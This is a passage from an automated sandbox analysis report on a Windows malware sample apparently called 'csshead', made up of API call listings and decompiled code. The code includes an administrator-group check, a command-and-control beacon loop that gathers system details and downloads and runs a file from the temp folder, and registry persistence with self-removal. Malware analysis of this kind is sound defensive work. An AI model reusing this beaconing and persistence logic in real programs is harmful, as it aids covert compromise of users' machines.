    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004041CC, Relevance: 15.1, APIs: 10, Instructions: 88thread
    C-Code - Quality: 100%
    			E004041CC() {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t51;

				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E004013DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t51 =  *_v16 - 1;
						if(_t51 >= 0) {
							_v36 = _t51 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L10;
							}
							_v5 = 1;
						}
						L10:
						FreeSid(_v24);
					}
					E00401440(_v16);
				}
				return _v5;
			}












    0x004041d2
    0x004041eb
    0x004041f2
    0x00404214
    0x00404214
    0x0040421b
    0x0040422b
    0x00404247
    0x0040424e
    0x00404258
    0x00404278
    0x00404283
    0x00404286
    0x00404289
    0x0040428c
    0x00404293
    0x004042b2
    0x004042b5
    0x004042b5
    0x004042b8
    0x00000000
    0x00000000
    0x00000000
    0x004042b8
    0x004042ac
    0x004042ac
    0x004042ba
    0x004042be
    0x004042be
    0x004042c7
    0x004042c7
    0x004042d2

    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042B900, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 322
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042B949, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 265
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042B9A7, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 260
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042CE7D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 196
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • GetFileType.KERNEL32(?), ref: 0042CFBD
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
    • GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
    • GetFileType.KERNEL32(00000000), ref: 0042D059
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
    • SetHandleCount.KERNEL32 ref: 0042D0B0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00419080, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132window
    APIs
    • MapWindowPoints.USER32(?,00000000,00000001,00000001), ref: 004190B6
    • MapWindowPoints.USER32(?,00000000,00000000,00000002), ref: 004190E1
    • GetVersionExA.KERNEL32(?), ref: 00419104
    • SendMessageA.USER32 ref: 00419186
    • IsWindow.USER32(00000000), ref: 0041918F
    • SendMessageA.USER32(00000000,0000052F,00000000,?), ref: 004191D0
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,-00000001,00000000,?,?,?), ref: 00419202
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00418850, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128window
    APIs
    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004188C1
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 0041890C
    • CheckMenuRadioItem.USER32(?,?,?,00000000,00000000), ref: 004189DC
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 0041898E
    • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004189BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004198E0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114thread
    APIs
    • RtlEnterCriticalSection.NTDLL ref: 0041991C
    • GetCurrentThreadId.KERNEL32 ref: 00419922
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
    • InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
    • ShowWindow.USER32(?,?), ref: 004199EA
      • Part of subcall function 00410190: IsWindow.USER32(?), ref: 0041019A
      • Part of subcall function 00410190: GetWindowLongA.USER32(?,000000FC), ref: 004101B4
      • Part of subcall function 00410190: SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041EA50, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85
    APIs
    • GetWindowLongA.USER32(?), ref: 0041EA81
    • GetWindowLongA.USER32(?,000000F0), ref: 0041EA90
    • GetWindowLongA.USER32(?,000000F0), ref: 0041EAA6
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
    • CreateWindowExA.USER32(00000200,MDIClient,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90,773A8CD0), ref: 0041EB01
    • BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 00418B30: GetClientRect.USER32 ref: 00418B55
      • Part of subcall function 00418B30: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00418B90
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413E50, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83window
    APIs
    • SetTextColor.GDI32(?,?), ref: 00413E6B
    • SetBkMode.GDI32(?,?), ref: 00413E76
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
    • SelectObject.GDI32(?,00000000), ref: 00413E9C
    • SendMessageA.USER32 ref: 00413F0F
    • DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
    • SelectObject.GDI32(?,?), ref: 00413F47
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041FDD0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44string
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004210D0, Relevance: 13.7, APIs: 9, Instructions: 176string
    APIs
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
    • lstrlen.KERNEL32 ref: 00421136
    • InterlockedDecrement.KERNEL32(?), ref: 004211A8
    • PathFindExtensionA.SHLWAPI(?), ref: 004211FB
    • lstrcmpi.KERNEL32(00000000,?), ref: 0042120F
    • InterlockedDecrement.KERNEL32(?), ref: 00421230
    • InterlockedDecrement.KERNEL32(?), ref: 0042128D
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
    • InterlockedDecrement.KERNEL32(?), ref: 004212D3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413F60, Relevance: 13.6, APIs: 9, Instructions: 120
    APIs
    • GetSystemMetrics.USER32(0000000F), ref: 00413F80
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 00413FDC
    • CreateFontIndirectA.GDI32(?), ref: 00413FEF
    • SelectObject.GDI32(00000000,?), ref: 00414009
    • DrawTextA.USER32(00000000,?,000000FF,?,00000424), ref: 00414032
    • SelectObject.GDI32(00000000,?), ref: 00414046
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 0041406F
    • GetSystemMetrics.USER32(00000047), ref: 004140AD
    • DeleteObject.GDI32(?), ref: 004140C3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004084A4, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 335sleepthread
    C-Code - Quality: 98%
    			E004084A4() {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v156;
				char _v4253;
				char _v4382;
				char _v4424;
				char _v4428;
				intOrPtr _t119;
				intOrPtr _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t157;
				intOrPtr _t165;
				intOrPtr _t170;
				intOrPtr _t174;
				intOrPtr _t179;
				intOrPtr _t187;
				void* _t195;
				intOrPtr _t198;
				signed int _t199;
				char _t202;
				intOrPtr _t205;
				signed int _t208;
				intOrPtr _t220;
				intOrPtr _t228;
				char _t236;
				intOrPtr _t269;
				char _t276;
				intOrPtr _t279;
				intOrPtr _t283;
				intOrPtr _t289;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				void* _t300;
				void* _t301;
				void* _t317;

				_v68 = _t119;
				_v40 = E004013DC(0x20000);
				_v60 = 0;
				_v64 = 0;
				_v4382 = 0;
				if( *0x40b77c == 0) {
					_t276 =  *0x40c355; // 0x0
					_v4428 = _t276;
					E00401308( &_v4424, 0x40c384);
					while(1) {
						_t281 =  &_v4428;
						_t279 =  *0x40a194; // 0x401e9c
						_v12 = E00405AE8(_t279,  &_v4428, 0);
						if(_v12 != 0) {
							goto L4;
						}
						Sleep(0x4e20);
					}
					while(1) {
						L4:
						_v48 = 0;
						E004064BC( &_v156, 0x32, __eflags);
						_t283 =  *0x40a198; // 0x401eac
						E00401308(_v40, _t283);
						E0040133C(_v40, "1530474054");
						_t131 =  *0x40a19c; // 0x401eb4
						E0040133C(_v40, _t131);
						_t135 =  *0x40b77c; // 0x0
						E00401864(_t135,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t140 =  *0x40a0bc; // 0x401c84
						E0040133C(_v40, _t140);
						_t144 =  *0x40c380; // 0x0
						E00401864(_t144,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t149 =  *0x40a0c0; // 0x401c8c
						E0040133C(_v40, _t149);
						_t152 =  *0x40c37c; // 0x0
						E00401164(_t152,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t157 =  *0x40a0b4; // 0x401c70
						E0040133C(_v40, _t157);
						E00408258( &_v4253);
						E0040133C(_v40,  &_v4253);
						_t165 =  *0x40a0b8; // 0x401c78
						E0040133C(_v40, _t165);
						E0040133C(_v40, 0x408984);
						_t170 =  *0x40a0c4; // 0x401c94
						E0040133C(_v40, _t170);
						_t174 =  *0x40c355; // 0x0
						E00401864(_t174,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t317 = _t301 + 0x80;
						__eflags = _v4382;
						if(_v4382 != 0) {
							E0040133C(_v40,  &_v4382);
							_t317 = _t317 + 8;
						}
						_t179 =  *0x40a1bc; // 0x401ef8
						E0040133C(_v40, _t179);
						E00404154( &_v4253);
						E0040133C(_v40,  &_v4253);
						_t187 =  *0x40a0c8; // 0x401c9c
						E0040133C(_v40, _t187);
						_t301 = _t317 + 0x18;
						_v8 = 0;
						_v44 = GetTickCount();
						__eflags = _v44 - 0x3a98;
						if(_v44 < 0x3a98) {
							__eflags = 0x3a98;
							Sleep(0x3a98 - _v44);
						}
						_t195 = E004012DC(_v40);
						_t198 =  *0x40c230; // 0x0
						_t199 =  *0x40b784; // 0x0
						_v12 = E00405D20(_t281, _t199 &  *0x40a074, _t198,  &_v156, 0x40b625, 0x40c355, _v40, _t195,  &_v16,  &_v20);
						__eflags = _v12;
						if(_v12 == 0) {
							break;
						}
						_t289 =  *0x40a240; // 0x4020a8
						_v36 = E00401110(_v16, _t289);
						_v24 = _v16;
						_t220 =  *0x40c355; // 0x0
						 *0x40b64d = _t220;
						 *0x40b780 = E00405468();
						E00407474(0x40b61c, __eflags);
						_t290 =  *0x40a1a8; // 0x401ecc
						__eflags =  *_v24 -  *_t290;
						if( *_v24 ==  *_t290) {
							L21:
							E00401440(_v16);
							do {
								_v48 = _v48 + 1;
								Sleep(0x3e8);
								_v52 = _v52 + 1;
								_t228 =  *0x40b715; // 0x0
								__eflags = _t228 - _v48;
							} while (__eflags > 0);
							continue;
						}
						_v56 = 0;
						_v28 = 0;
						_t291 =  *0x40a190; // 0x401e8c
						_v28 = E00401110(_v24, _t291);
						__eflags = _v28;
						if(_v28 == 0) {
							_t292 =  *0x40a18c; // 0x401e7c
							_v28 = E00401110(_v24, _t292);
						} else {
							_v56 = 0xffffffff;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							_v44 = _v28 - _v24;
							_v28 = _v28 + 0xd;
							_v36 = E00401110(_v28, E00408988);
							_v32 = _v36 - _v28;
							_t281 = _v32;
							E004012B8( &_v4253, _v32, _v28);
							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
							_v32 = E004010E0( &_v4253, _v28);
							_t269 = _v36 + 2;
							__eflags = _t269;
							_v28 = _t269;
							 *((char*)(_v24 + _v44)) = 0;
						}
						__eflags = _v56;
						if(__eflags == 0) {
							L19:
							_t236 = E00407F20(_v24, _t281, 4);
							__eflags = _t236;
							if(_t236 != 0) {
								E004080C0(_v56);
								E00401440(_v40);
								E00401440(_v16);
								_push(0);
								RtlExitUserThread();
							}
							goto L21;
						} else {
							_t281 = _v32;
							__eflags = E004082F8(_v24, _v32, _v28, __eflags);
							if(__eflags == 0) {
								E00401440(_v16);
								continue;
							}
							E004080C0(_v56);
							E00401440(_v40);
							E00401440(_v16);
							_push(0);
							RtlExitUserThread();
							goto L19;
						}
					}
					_t202 =  *0x40c355; // 0x0
					_v4428 = _t202;
					E00401308( &_v4424, 0x40c384);
					_t205 =  *0x40b651; // 0x0
					_t208 =  *0x40b784; // 0x0
					_t281 =  *0x40b780; // 0x0
					__eflags = E0040660C(_t208 &  *0x40a074, _t281, 0x40b625, __eflags, 0x40ba00,  &_v4428,  &_v4253, _t205);
					if(__eflags != 0) {
						E00401308(0x40b625,  &_v4253);
						E00401308(0x40c254,  &_v4253);
					}
					 *0x40c355 = _v4428;
					 *0x40b64d = _v4428;
				}
			}

























































    0x004084b4
    0x004084c1
    0x004084c6
    0x004084cb
    0x004084ce
    0x004084dc
    0x004084de
    0x004084e3
    0x004084f4
    0x004084f9
    0x004084f9
    0x00408501
    0x0040850b
    0x00408512
    0x00000000
    0x00000000
    0x00408519
    0x00408519
    0x00408521
    0x00408521
    0x00408523
    0x0040852e
    0x00408533
    0x0040853c
    0x0040854a
    0x00408552
    0x0040855c
    0x0040856b
    0x00408571
    0x00408584
    0x0040858c
    0x00408596
    0x004085a5
    0x004085ab
    0x004085be
    0x004085c6
    0x004085d0
    0x004085de
    0x004085e3
    0x004085f3
    0x004085fb
    0x00408605
    0x00408613
    0x00408623
    0x0040862b
    0x00408635
    0x00408646
    0x0040864e
    0x00408658
    0x00408667
    0x0040866d
    0x00408680
    0x00408685
    0x00408688
    0x0040868f
    0x0040869c
    0x004086a1
    0x004086a1
    0x004086a4
    0x004086ae
    0x004086bc
    0x004086cc
    0x004086d4
    0x004086de
    0x004086e3
    0x004086e8
    0x004086f1
    0x004086f4
    0x004086fb
    0x00408702
    0x00408706
    0x00408706
    0x00408717
    0x00408732
    0x00408738
    0x00408749
    0x0040874c
    0x00408750
    0x00000000
    0x00000000
    0x00408756
    0x00408764
    0x0040876a
    0x0040876d
    0x00408772
    0x0040877c
    0x00408786
    0x00408790
    0x00408796
    0x00408798
    0x004088bc
    0x004088bf
    0x00408957
    0x00408957
    0x0040895f
    0x00408965
    0x00408968
    0x0040896d
    0x0040896d
    0x00000000
    0x00408972
    0x004087a0
    0x004087a5
    0x004087a8
    0x004087b6
    0x004087b9
    0x004087bd
    0x004087c8
    0x004087d6
    0x004087bf
    0x004087bf
    0x004087bf
    0x004087d9
    0x004087dd
    0x004087e5
    0x004087ee
    0x004087fe
    0x00408807
    0x00408810
    0x00408816
    0x0040881e
    0x00408831
    0x00408837
    0x00408837
    0x0040883a
    0x00408843
    0x00408843
    0x00408847
    0x0040884b
    0x0040888e
    0x00408893
    0x00408898
    0x0040889a
    0x0040889f
    0x004088a7
    0x004088af
    0x004088b4
    0x004088b6
    0x004088b6
    0x00000000
    0x0040884d
    0x0040884d
    0x0040885b
    0x0040885d
    0x00408884
    0x00000000
    0x00408884
    0x00408862
    0x0040886a
    0x00408872
    0x00408877
    0x00408879
    0x00000000
    0x00408879
    0x0040884b
    0x004088c9
    0x004088ce
    0x004088df
    0x004088e4
    0x00408902
    0x0040890d
    0x00408918
    0x0040891a
    0x00408927
    0x00408937
    0x00408937
    0x00408942
    0x0040894d
    0x0040894d

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00404154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00404169
    • GetTickCount.KERNEL32 ref: 004086EB
    • Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
    • RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004082F8: GetTempPathA.KERNEL32(00000201,?), ref: 00408364
      • Part of subcall function 004082F8: Sleep.KERNEL32(000005DC), ref: 004083E3
      • Part of subcall function 004082F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 004082F8: wsprintfA.USER32 ref: 00408476
    • RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004080C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
      • Part of subcall function 004080C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
      • Part of subcall function 004080C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 004080C0: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 004080C0: ReleaseMutex.KERNEL32(00000000), ref: 00408221
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 0040822D
      • Part of subcall function 004080C0: ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 004066F5
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004067AF
      • Part of subcall function 0040660C: Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 0040660C: Sleep.KERNEL32(000493E0), ref: 004067F3
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 0040680F
    • Sleep.KERNEL32(000003E8), ref: 0040895F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042B9C5, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 272
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
